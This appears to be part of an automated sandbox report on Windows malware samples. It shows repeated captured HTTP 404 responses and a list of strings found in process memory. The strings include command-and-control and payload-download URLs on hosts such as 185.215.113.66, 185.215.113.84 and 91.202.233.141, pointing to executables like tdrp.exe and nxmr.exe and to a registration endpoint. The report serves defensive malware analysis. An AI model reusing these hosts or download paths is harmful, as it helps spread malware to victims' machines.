                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:28:26 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:28:30 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:28:33 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:28:36 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 26 Oct 2024 05:28:39 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                                Source: lJ4EzPSKMj.exe, 00000000.00000003.1532891625.0000000001304000.00000004.00000020.00020000.00000000.sdmp, 5232.scr, 00000003.00000003.1557882217.0000000000496000.00000004.00000020.00020000.00000000.sdmp, 5232.scr, 00000003.00000000.1534188945.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 5232.scr, 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysppvrdnvs.exe, 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000000.1557031071.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000000.1653820217.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://185.215.113.66/
                                Source: sysppvrdnvs.exe, 00000004.00000003.1673002910.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2911602093.0000000000803000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.1672852069.00000000032EC000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2908945588.00000000007CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1F
                                Source: sysppvrdnvs.exe, 00000004.00000003.1672852069.00000000032EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1KKC:
                                Source: sysppvrdnvs.exe, 00000004.00000003.1673002910.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1s
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.00000000007CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2
                                Source: sysppvrdnvs.exe, 00000004.00000003.1888137491.00000000032E7000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.1888097400.00000000032E5000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2914922304.00000000032E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2C:
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.00000000007CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2D
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2M
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2P
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2_
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2a
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2s
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.1887906362.00000000032F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/3
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.00000000007C3000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000003.1887906362.00000000032F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4C:
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/4ystem32
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.00000000007C3000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2908945588.00000000007CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5;
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.00000000007CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5C:
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/5z
                                Source: 5232.scr, 00000003.00000003.1557882217.0000000000496000.00000004.00000020.00020000.00000000.sdmp, 5232.scr, 00000003.00000000.1534188945.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 5232.scr, 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysppvrdnvs.exe, 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000000.1557031071.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000000.1653820217.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s
                                Source: lJ4EzPSKMj.exe, 00000000.00000003.1532891625.0000000001304000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/q9
                                Source: 2573513776.exe, 00000019.00000000.1844444958.00000000007E2000.00000002.00000001.01000000.0000000A.sdmp, 2573513776.exe, 00000019.00000002.1887832936.00000000007E2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://185.215.113.66/reg.php?s=%s
                                Source: 2573513776.exe, 00000019.00000000.1844444958.00000000007E2000.00000002.00000001.01000000.0000000A.sdmp, 2573513776.exe, 00000019.00000002.1887832936.00000000007E2000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://185.215.113.66/reg.php?s=%sMozilla/5.0
                                Source: sysppvrdnvs.exeString found in binary or memory: http://185.215.113.66/tdrp.exe
                                Source: 5232.scr, 00000003.00000003.1557882217.0000000000496000.00000004.00000020.00020000.00000000.sdmp, 5232.scr, 00000003.00000000.1534188945.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 5232.scr, 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysppvrdnvs.exe, 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000000.1557031071.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000000.1653820217.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://185.215.113.66/tdrp.exe%s:Zone.Identifier/c
                                Source: lJ4EzPSKMj.exe, 00000000.00000003.1532926130.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, lJ4EzPSKMj.exe, 00000000.00000003.1532891625.0000000001304000.00000004.00000020.00020000.00000000.sdmp, lJ4EzPSKMj.exe, 00000000.00000002.1534909567.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, lJ4EzPSKMj.exe, 00000000.00000003.1532926130.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, lJ4EzPSKMj.exe, 00000000.00000003.1532891625.000000000131B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/tdrpl.exe
                                Source: lJ4EzPSKMj.exe, 00000000.00000003.1532926130.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, lJ4EzPSKMj.exe, 00000000.00000002.1534909567.00000000012FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/tdrpl.exe#
                                Source: lJ4EzPSKMj.exe, 00000000.00000003.1532891625.0000000001304000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/tdrpl.exe658-3693405117-2476756634-1003D9
                                Source: lJ4EzPSKMj.exe, 00000000.00000003.1532926130.00000000012E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/tdrpl.exe;
                                Source: lJ4EzPSKMj.exe, 00000000.00000002.1534909567.00000000012AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/tdrpl.exeB
                                Source: lJ4EzPSKMj.exe, 00000000.00000003.1532891625.0000000001304000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/tdrpl.exeLMEM
                                Source: lJ4EzPSKMj.exe, 00000000.00000003.1532926130.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, lJ4EzPSKMj.exe, 00000000.00000002.1534909567.00000000012FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/tdrpl.exeN
                                Source: lJ4EzPSKMj.exe, 00000000.00000003.1532926130.00000000012C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/tdrpl.exeSSC:
                                Source: lJ4EzPSKMj.exe, 00000000.00000003.1532891625.000000000131B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/tdrpl.execrC:
                                Source: 28849683.exe, 0000001C.00000002.2053772305.0000000000C92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/
                                Source: 28849683.exe, 0000001C.00000002.2053772305.0000000000C92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/nxmr.exe
                                Source: 28849683.exe, 0000001C.00000002.2053772305.0000000000C4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/nxmr.exe5
                                Source: 28849683.exe, 0000001C.00000002.2053772305.0000000000C4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/nxmr.exe:
                                Source: sysppvrdnvs.exe, 00000004.00000002.2914673309.0000000002E73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/nxmr.exeP0
                                Source: 28849683.exe, 0000001C.00000002.2053654739.0000000000412000.00000002.00000001.01000000.0000000B.sdmp, 28849683.exe, 0000001C.00000000.1927965529.0000000000412000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://185.215.113.84/nxmr.exeP0A
                                Source: 28849683.exe, 0000001C.00000002.2053772305.0000000000C92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/nxmr.exeW
                                Source: 28849683.exe, 0000001C.00000002.2053772305.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp, 28849683.exe, 0000001C.00000002.2053772305.0000000000C92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/nxmr.exeh
                                Source: 28849683.exe, 0000001C.00000002.2053772305.0000000000C92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/nxmr.exeystem32
                                Source: 5232.scr, 00000003.00000003.1557882217.0000000000496000.00000004.00000020.00020000.00000000.sdmp, 5232.scr, 00000003.00000000.1534188945.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 5232.scr, 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysppvrdnvs.exe, 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000004.00000000.1557031071.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000000.1653820217.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 15714163.exe, 0000001D.00000002.2066012173.0000000000A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/
                                Source: 15714163.exe, 0000001D.00000002.2066012173.0000000000A91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/#
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.0000000000797000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/1
                                Source: sysppvrdnvs.exe, 00000004.00000002.2908945588.00000000007CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/2
